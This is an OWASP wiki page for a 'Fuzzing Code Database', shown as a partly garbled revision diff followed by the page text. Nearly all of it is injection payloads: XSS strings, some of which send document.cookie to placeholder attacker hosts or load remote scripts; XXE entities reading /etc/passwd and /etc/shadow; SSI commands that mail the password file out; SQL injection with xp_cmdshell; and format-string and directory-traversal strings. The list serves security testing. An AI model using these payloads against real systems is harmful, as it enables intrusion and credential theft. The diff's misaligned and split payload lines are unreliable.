"<SCRIPT>document.write(""<SCRI"");</SCRIPT>PT SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
+
"&lt;SCRIPT&gt;document.write(""&lt;SCRI"");&lt;/SCRIPT&gt;PT SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"
"<A HREF=""http://66.102.7.147/"">XSS</A>"
+
"&lt;A HREF=""http://66.102.7.147/""&gt;XSS&lt;/A&gt;"
"<A HREF=""http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D"">XSS</A>"
+
"&lt;A HREF=""http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D""&gt;XSS&lt;/A&gt;"
"<A HREF=""http://1113982867/"">XSS</A>"
+
"&lt;A HREF=""http://1113982867/""&gt;XSS&lt;/A&gt;"
"<A HREF=""http://0x42.0x0000066.0x7.0x93/"">XSS</A>"
+
"&lt;A HREF=""http://0x42.0x0000066.0x7.0x93/""&gt;XSS&lt;/A&gt;"
"<A HREF=""http://0102.0146.0007.00000223/"">XSS</A>"
+
"&lt;A HREF=""http://0102.0146.0007.00000223/""&gt;XSS&lt;/A&gt;"
"<A HREF=""h\ntt\tp://6"
+
"&lt;A HREF=""h\ntt\tp://6"
"<A HREF=""//www.google.com/"">XSS</A>"
+
"&lt;A HREF=""//www.google.com/""&gt;XSS&lt;/A&gt;"
"<A HREF=""//google"">XSS</A>"
+
"&lt;A HREF=""//google""&gt;XSS&lt;/A&gt;"
"<A HREF=""http://google.com/"">XSS</A>"
+
"&lt;A HREF=""http://google.com/""&gt;XSS&lt;/A&gt;"
"<A HREF=""http://www.google.com./"">XSS</A>"
+
"&lt;A HREF=""http://www.google.com./""&gt;XSS&lt;/A&gt;"
"<A HREF=""javascript:document.location='http://www.google.com/'"">XSS</A>"
+
"&lt;A HREF=""javascript:document.location='http://www.google.com/'""&gt;XSS&lt;/A&gt;"
"<A HREF=""http://www.gohttp://www.google.com/ogle.com/"">XSS</A>"
+
"&lt;A HREF=""http://www.gohttp://www.google.com/ogle.com/""&gt;XSS&lt;/A&gt;"
"<div onmouseover=""document.write(""XSS-XSS-XSS"");"">"
+
"&lt;div onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;"
"<img src=""javascript:document.write(""XSS-XSS-XSS"");"">"
+
"&lt;img src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"
"<input type=""image"" dynsrc=""javascript:document.write(""XSS-XSS-XSS"");"">"
+
"&lt;input type=""image"" dynsrc=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"
"<bgsound src=""javascript:document.write(""XSS-XSS-XSS"");"">"
+
"&lt;bgsound src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"
"&{document.write(""XSS-XSS-XSS"");};"
+
"&amp;{document.write(""XSS-XSS-XSS"");};"
"<img src=&{document.write(""XSS-XSS-XSS"");};>"
+
"&lt;img src=&amp;{document.write(""XSS-XSS-XSS"");};&gt;"
"<link rel=""stylesheet"" href=""javascript:document.write(""XSS-XSS-XSS"");"">"
+
"&lt;link rel=""stylesheet"" href=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"
"<iframe src=""vbscript:document.write(""XSS-XSS-XSS"");"">"
+
"&lt;iframe src=""vbscript:document.write(""XSS-XSS-XSS"");""&gt;"
"<img src=""livescript:document.write(""XSS-XSS-XSS"");"">"
+
"&lt;img src=""livescript:document.write(""XSS-XSS-XSS"");""&gt;"
"<a href=""about:<script>document.write(""XSS-XSS-XSS"");</script>"">"
+
"&lt;a href=""about:&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;""&gt;"
"<meta http-equiv=""refresh"" content=""0;url=javascript:document.write(""XSS-XSS-XSS"");"">"
+
"&lt;meta http-equiv=""refresh"" content=""0;url=javascript:document.write(""XSS-XSS-XSS"");""&gt;"
"<body onload=""document.write(""XSS-XSS-XSS"");"">"
+
"&lt;body onload=""document.write(""XSS-XSS-XSS"");""&gt;"
"<div style=""background-image: url(javascript:document.write(""XSS-XSS-XSS""););"">"
+
"&lt;div style=""background-image: url(javascript:document.write(""XSS-XSS-XSS""););""&gt;"
"<div style=""behaviour: url([link to code]);"">"
+
"&lt;div style=""behaviour: url([link to code]);""&gt;"
"<div style=""binding: url([link to code]);"">"
+
"&lt;div style=""binding: url([link to code]);""&gt;"
"<div style=""width: expression(document.write(""XSS-XSS-XSS""););"">"
+
"&lt;div style=""width: expression(document.write(""XSS-XSS-XSS""););""&gt;"
"<style type=""text/javascript"">document.write(""XSS-XSS-XSS"");</style>"
+
"&lt;style type=""text/javascript""&gt;document.write(""XSS-XSS-XSS"");&lt;/style&gt;"
"<object classid=""clsid:..."" codebase=""javascript:document.write(""XSS-XSS-XSS"");"">"
+
"&lt;object classid=""clsid:..."" codebase=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"
"<style><!--</style><script>document.write(""XSS-XSS-XSS"");//--></script>"
+
"&lt;style&gt;&lt;!--&lt;/style&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");//--&gt;&lt;/script&gt;"
"<![CDATA[<!--]]><script>document.write(""XSS-XSS-XSS"");//--></script>"
+
"&lt;![CDATA[&lt;!--]]&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");//--&gt;&lt;/script&gt;"
"<<script>document.write(""XSS-XSS-XSS"");</script>"
+
"&lt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;"
"<img src=""blah""onmouseover=""document.write(""XSS-XSS-XSS"");"">"
+
"&lt;img src=""blah""onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;"
"<img src=""blah>"" onmouseover=""document.write(""XSS-XSS-XSS"");"">"
+
"&lt;img src=""blah&gt;"" onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;"
"<div datafld=""b"" dataformatas=""html"" datasrc=""#X""></div>"
+
"&lt;div datafld=""b"" dataformatas=""html"" datasrc=""#X""&gt;&lt;/div&gt;"
"<a href=""javascript#document.write(""XSS-XSS-XSS"");"">"
+
"&lt;a href=""javascript#document.write(""XSS-XSS-XSS"");""&gt;"
"<img dynsrc=""javascript:document.write(""XSS-XSS-XSS"");"">"
+
"&lt;img dynsrc=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"
"&<script>document.write(""XSS-XSS-XSS"");</script>"
+
"&amp;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;"
"<img src=""mocha:document.write(""XSS-XSS-XSS"");"">"
+
"&lt;img src=""mocha:document.write(""XSS-XSS-XSS"");""&gt;"
"<div style=""binding: url([link to code]);""> [Mozilla]"
+
"&lt;div style=""binding: url([link to code]);""&gt; [Mozilla]"
"<!-- -- --><script>document.write(""XSS-XSS-XSS"");</script><!-- -- -->"
+
"&lt;!-- -- --&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;&lt;!-- -- --&gt;"
"<xml src=""javascript:document.write(""XSS-XSS-XSS"");"">"
+
"&lt;xml src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"
"<xml id=""X""><a><b><script>document.write(""XSS-XSS-XSS"");</script>;</b></a></xml>"
+
"&lt;xml id=""X""&gt;&lt;a&gt;&lt;b&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;;&lt;/b&gt;&lt;/a&gt;&lt;/xml&gt;"
"[\xC0][\xBC]script>document.write(""XSS-XSS-XSS"");[\xC0][\xBC]/script>"
+
"[\xC0][\xBC]script&gt;document.write(""XSS-XSS-XSS"");[\xC0][\xBC]/script&gt;"
><script>
+
&gt;&lt;script&gt;
"<script>alert(""WXSS"")</script>"
+
"&lt;script&gt;alert(""WXSS"")&lt;/script&gt;"
"<<script>alert(""WXSS"");//<</script>"
+
"&lt;&lt;script&gt;alert(""WXSS"");//&lt;&lt;/script&gt;"
<script>alert(document.cookie)</script>
+
&lt;script&gt;alert(document.cookie)&lt;/script&gt;
'><script>alert(document.cookie)</script>
+
'&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;
'><script>alert(document.cookie);</script>
+
'&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt;
 
"%3cscript%3ealert(""WXSS"");%3c/script%3e"
 
"%3cscript%3ealert(""WXSS"");%3c/script%3e"
 
%3cscript%3ealert(document.cookie);%3c%2fscript%3e
 
%3cscript%3ealert(document.cookie);%3c%2fscript%3e
 
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
 
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
&ltscript&gtalert(document.cookie);</script>
+
&amp;ltscript&amp;gtalert(document.cookie);&lt;/script&gt;
&ltscript&gtalert(document.cookie);&ltscript&gtalert
+
&amp;ltscript&amp;gtalert(document.cookie);&amp;ltscript&amp;gtalert
<xss><script>alert('WXSS')</script></vulnerable>
+
&lt;xss&gt;&lt;script&gt;alert('WXSS')&lt;/script&gt;&lt;/vulnerable&gt;
<IMG%20SRC='javascript:alert(document.cookie)'>
+
&lt;IMG%20SRC='javascript:alert(document.cookie)'&gt;
"<IMG%20SRC=""javascript:alert('WXSS');"">"
+
"&lt;IMG%20SRC=""javascript:alert('WXSS');""&gt;"
"<IMG%20SRC=""javascript:alert('WXSS')"""
+
"&lt;IMG%20SRC=""javascript:alert('WXSS')"""
<IMG%20SRC=JaVaScRiPt:alert('WXSS')>
+
&lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&gt;
<IMG%20SRC=javascript:alert(&quot;WXSS&quot;)>
+
&lt;IMG%20SRC=javascript:alert("WXSS")&gt;
"<IMG%20SRC=`javascript:alert(""'WXSS'"")`>"
+
"&lt;IMG%20SRC=`javascript:alert(""'WXSS'"")`&gt;"
"<IMG%20""""""><SCRIPT>alert(""WXSS"")</SCRIPT>"">"
+
"&lt;IMG%20""""""&gt;&lt;SCRIPT&gt;alert(""WXSS"")&lt;/SCRIPT&gt;""&gt;"
<IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>
+
&lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;
<IMG%20SRC='javasc
+
&lt;IMG%20SRC='javasc
"<IMG%20SRC=""jav"
+
"&lt;IMG%20SRC=""jav"
"<IMG%20SRC=""jav&#x09;ascript:alert('WXSS');"">"
+
"&lt;IMG%20SRC=""jav ascript:alert('WXSS');""&gt;"
"<IMG%20SRC=""jav&#x0A;ascript:alert('WXSS');"">"
+
"&lt;IMG%20SRC=""jav
"<IMG%20SRC=""jav&#x0D;ascript:alert('WXSS');"">"
+
ascript:alert('WXSS');""&gt;"
"<IMG%20SRC=""%20&#14;%20javascript:alert('WXSS');"">"
+
"&lt;IMG%20SRC=""jav
"<IMG%20DYNSRC=""javascript:alert('WXSS')"">"
+
ascript:alert('WXSS');""&gt;"
"<IMG%20LOWSRC=""javascript:alert('WXSS')"">"
+
"&lt;IMG%20SRC=""%20&amp;#14;%20javascript:alert('WXSS');""&gt;"
<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>
+
"&lt;IMG%20DYNSRC=""javascript:alert('WXSS')""&gt;"
<IMG%20SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
+
"&lt;IMG%20LOWSRC=""javascript:alert('WXSS')""&gt;"
<IMG%20SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
+
&lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&gt;
<IMG%20SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
+
&lt;IMG%20SRC=javascript:alert('XSS')&gt;
 +
&lt;IMG%20SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;
 +
&lt;IMG%20SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;
 
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
 
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
"><script>document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie</script>
+
"&gt;&lt;script&gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&lt;/script&gt;
 
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
 
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
+
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&gt;&lt;/SCRIPT&gt;!--&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;=&amp;{}
'';!--<XSS>=&{()}"
+
'';!--&lt;XSS&gt;=&amp;{()}"
</pre>
+
</pre>
 +
<br>  
  
 
+
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15) ===
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15) ===
+
<pre>Statements
 
+
<pre>
+
Statements
+
 
count(/child::node())
 
count(/child::node())
 
x' or name()='username' or 'x'='y
 
x' or name()='username' or 'x'='y
<name>','')); phpinfo(); exit;/*</name>
+
&lt;name&gt;','')); phpinfo(); exit;/*&lt;/name&gt;
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
+
&lt;![CDATA[&lt;script&gt;var n=0;while(true){n++;}&lt;/script&gt;]]&gt;
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
+
&lt;![CDATA[&lt;]]&gt;SCRIPT&lt;![CDATA[&gt;]]&gt;alert('XSS');&lt;![CDATA[&lt;]]&gt;/SCRIPT&lt;![CDATA[&gt;]]&gt;
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>"
+
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;foo&gt;&lt;![CDATA[&lt;]]&gt;SCRIPT&lt;![CDATA[&gt;]]&gt;alert('XSS');&lt;![CDATA[&lt;]]&gt;/SCRIPT&lt;![CDATA[&gt;]]&gt;&lt;/foo&gt;"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[' or 1=1 or ''=']]></foo>"
+
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;foo&gt;&lt;![CDATA[' or 1=1 or ''=']]&gt;&lt;/foo&gt;"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:/boot.ini"">]><foo>&xxe;</foo>"
+
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file://c:/boot.ini""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/passwd"">]><foo>&xxe;</foo>"
+
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file:////etc/passwd""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/shadow"">]><foo>&xxe;</foo>"
+
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file:////etc/shadow""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////dev/random"">]><foo>&xxe;</foo>"
+
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file:////dev/random""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"
"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
+
"&lt;xml ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=""javas]]&gt;&lt;![CDATA[cript:alert('XSS');""&gt;]]&gt;"
"<xml ID=""xss""><I><B>&lt;IMG SRC=""javas<!-- -->cript:alert('XSS')""&gt;</B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
+
"&lt;xml ID=""xss""&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=""javas&lt;!-- --&gt;cript:alert('XSS')""&gt;&lt;/B&gt;&lt;/I&gt;&lt;/xml&gt;&lt;SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""&gt;&lt;/SPAN&gt;&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"
"<xml SRC=""xsstest.xml"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
+
"&lt;xml SRC=""xsstest.xml"" ID=I&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
+
"&lt;HTML xmlns:xss&gt;&lt;?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/HTML&gt;"
</pre>
+
</pre>  
 
+
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28)===
+
<pre>%s%p%x%d
 
+
<pre>
+
%s%p%x%d
+
 
.1024d
 
.1024d
 
%.2049d
 
%.2049d
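Review bot: in the IMG%20SRC statements of the XSS list, the new revision escapes < and > but decodes several character references instead of escaping their ampersand. The jav&#x09;ascript, jav&#x0A;ascript and jav&#x0D;ascript statements now carry a literal space or line break, so the last two are split into a line ending in "jav" and a separate line starting with "ascript:alert('WXSS');", and the decimal &#106;&#97;&#118;… statement has become plain javascript:alert('XSS'). Escape these the way the neighbouring &amp;#14;, &amp;#0000106… and &amp;#x6A… lines of the same hunk already do (&amp;#x09;, &amp;#x0A;, &amp;#x0D;, &amp;#106;…), so that each statement stays on one line and still renders with the encoding it is listed for.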
Line 703: Line 678:
 
%.16705u%2\$hn
 
%.16705u%2\$hn
 
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|
 
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id > /tmp/file; exit;
+
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &gt; /tmp/file; exit;
</pre>
+
</pre>  
 
+
==== Project Contributor ====
==== Project Contributor ====
+
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']]
+
  
Reviewer: [[:User:eneves|'''Eduardo Neves''']]
+
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']]  
  
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']]
+
Reviewer: [[:User:eneves|'''Eduardo Neves''']]  
  
==== Feedback and Participation ====
+
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']]
  
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org
+
==== Feedback and Participation  ====
  
==== Project Identification ====
+
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org
  
[[Category:OWASP Project|Fuzzing Code Database]]
+
==== Project Identification  ====
[[Category:OWASP Document]]
+
[[Category:OWASP Alpha Quality Document]]
+
  
 
{{Template:OWASP Project Identification Tab
 
{{Template:OWASP Project Identification Tab
Line 815: Line 786:
 
| old_release_date5 =  
 
| old_release_date5 =  
 
| old_release_download_link5 =  
 
| old_release_download_link5 =  
}}  
+
}} __NOTOC__ <headertabs />  
__NOTOC__ <headertabs />
+
 
 +
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]

Revision as of 21:30, 3 February 2010

This database is a collection of several statements used in code injection, fuzzing and brute-force approaches. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like WebScarab, WebSlayer and JBroFuzz with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added.

News

02 February 2010

  • Created new Category Lotus/Notes Files

11 August 2009

  • Created new Category: XML Attacks

Update Statements

  • 15 new XML Statements
  • 93 new SQL Injections Statements
  • 67 new Traversal Directory Statements
  • Deleted 33 duplicate XSS statements
  • 30 New XSS Statements

7 August 2009

  • Updated the objectives of the project.

21 July 2009

  • Set the team responsible for the project.

Goals

This project intends to create a database that concentrates all tools which are based on wordlists, such as WebScarab, JBroFuzz, WebSlayer, DirBuster and others. In addition to current tools developed by OWASP members, we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL), where any tool can adopt and use an XML file maintained by OWASP.

In addition, the following functionalities will be included on this project:

1 - The statements of the ASDR Project

2 - Browser

3 - Operating System

4 - Databases

A URL will also be published to create a collaborative environment for the maintenance process, where the following features are planned:

1 - Deploy a process where a new statement can be suggested and registered if it is not valid yet and not maintained in another database.

2 - A list where, besides the statement, a single id will be maintained to identify each statement, with a description and the results of the exploitation.

3 - Support for users reporting their own experiences with the statements.

Statements

Lotus/Notes Files - (Update: 02 February 2010 - Total Statements: 111)

/852566C90012664F
/admin4.nsf
/admin5.nsf
/admin.nsf
/agentrunner.nsf
/alog.nsf
/a_domlog.nsf
/bookmark.nsf
/busytime.nsf
/catalog.nsf
/certa.nsf
/certlog.nsf
/certsrv.nsf
/chatlog.nsf
/clbusy.nsf
/cldbdir.nsf
/clusta4.nsf
/collect4.nsf
/da.nsf
/dba4.nsf
/dclf.nsf
/DEASAppDesign.nsf
/DEASLog01.nsf
/DEASLog02.nsf
/DEASLog03.nsf
/DEASLog04.nsf
/DEASLog05.nsf
/DEASLog.nsf
/decsadm.nsf
/decslog.nsf
/DEESAdmin.nsf
/dirassist.nsf
/doladmin.nsf
/domadmin.nsf
/domcfg.nsf
/domguide.nsf
/domlog.nsf
/dspug.nsf
/events4.nsf
/events5.nsf
/events.nsf
/event.nsf
/homepage.nsf
/iNotes/Forms5.nsf/$DefaultNav
/jotter.nsf
/leiadm.nsf
/leilog.nsf
/leivlt.nsf
/log4a.nsf
/log.nsf
/l_domlog.nsf
/mab.nsf
/mail10.box
/mail1.box
/mail2.box
/mail3.box
/mail4.box
/mail5.box
/mail6.box
/mail7.box
/mail8.box
/mail9.box
/mail.box
/msdwda.nsf
/mtatbls.nsf
/mtstore.nsf
/names.nsf
/nntppost.nsf
/nntp/nd000001.nsf
/nntp/nd000002.nsf
/nntp/nd000003.nsf
/ntsync45.nsf
/perweb.nsf
/qpadmin.nsf
/quickplace/quickplace/main.nsf
/reports.nsf
/sample/siregw46.nsf
/schema50.nsf
/setupweb.nsf
/setup.nsf
/smbcfg.nsf
/smconf.nsf
/smency.nsf
/smhelp.nsf
/smmsg.nsf
/smquar.nsf
/smsolar.nsf
/smtime.nsf
/smtpibwq.nsf
/smtpobwq.nsf
/smtp.box
/smtp.nsf
/smvlog.nsf
/srvnam.htm
/statmail.nsf
/statrep.nsf
/stauths.nsf
/stautht.nsf
/stconfig.nsf
/stconf.nsf
/stdnaset.nsf
/stdomino.nsf
/stlog.nsf
/streg.nsf
/stsrc.nsf
/userreg.nsf
/vpuserinfo.nsf
/webadmin.nsf
/web.nsf
/.nsf/../winnt/win.ini
/?Open 

SQL Injection - (Update: 11 August 2009 - Total Statements: 126)

Statement
'sqlvuln
'+sqlvuln
sqlvuln;
(sqlvuln)
a' or 1=1--
"a"" or 1=1--"
 or a = a
a' or 'a' = 'a
1 or 1=1
a' waitfor delay '0:0:10'--
1 waitfor delay '0:0:10'--
declare @q nvarchar (4000) select @q =
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A
0
031003000270000
declare @s varchar(22) select @s =
0x77616974666F722064656C61792027303A303A31302700 exec(@s)
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
exec(@s)
a'
?
' or 1=1
‘ or 1=1 --
x' AND userid IS NULL; --
x' AND email IS NULL; --
anything' OR 'x'='x
x' AND 1=(SELECT COUNT(*) FROM tabname); --
x' AND members.email IS NULL; --
x' OR full_name LIKE '%Bob%
23 OR 1=1
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
'
'%20or%20''='
'%20or%20'x'='x
%20or%20x=x
')%20or%20('x'='x
0 or 1=1
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
 or 0=0 #"
or 0=0 #
' or 1=1--
" or 1=1--
' or '1'='1'--
' or 1 --'
or 1=1--
or%201=1
or%201=1 --
' or 1=1 or ''='
 or 1=1 or ""=
' or a=a--
 or a=a
') or ('a'='a
) or (a=a
hi or a=a
hi or 1=1 --"
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
"hi"") or (""a""=""a"
'hi' or 'x'='x';
@variable
,@variable
PRINT
PRINT @@variable
select
insert
as
or
procedure
limit
order by
asc
desc
delete
update
distinct
having
truncate
replace
like
handler
bfilename
' or username like '%
' or uname like '%
' or userid like '%
' or uid like '%
' or user like '%
exec xp
exec sp
'; exec master..xp_cmdshell
'; exec xp_regread
t'exec master..xp_cmdshell 'nslookup www.google.com'--
--sp_password
\x27UNION SELECT
' UNION SELECT
' UNION ALL SELECT
' or (EXISTS)
' (select top 1
'||UTL_HTTP.REQUEST
1;SELECT%20*
to_timestamp_tz
tz_offset
<>"'%;)(&+
'%20or%201=1
%27%20or%201=1
%20$(sleep%2050)
%20'sleep%2050'
char%4039%41%2b%40SELECT
&apos;%20OR
'sqlattempt1
(sqlattempt2)
|
%7C
*|
%2A%7C
*(|(mail=*))
%2A%28%7C%28mail%3D%2A%29%29
*(|(objectclass=*))
%2A%28%7C%28objectclass%3D%2A%29%29
(
%28
)
%29
&
%26
!
%21
' or 1=1 or ''='
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
a' or 3=3--
"a"" or 3=3--"
' or 3=3
‘ or 3=3 --

SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)

<!--#exec cmd="/bin/ls /" --><br/>
<!--#exec cmd="cat /etc/passwd" --><br/>
<!--#exec cmd="find / -name *.* -print" --><br/>
<!--#exec cmd="mail Foobar@email.de <mailto:Foobar@email.de> < cat /etc/passwd" --><br/>

Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)

Statement
\..\WINDOWS\win.ini
\..\..\WINDOWS\win.ini
\..\..\..\WINDOWS\win.ini
\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\..\WINDOWS\win.ini
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
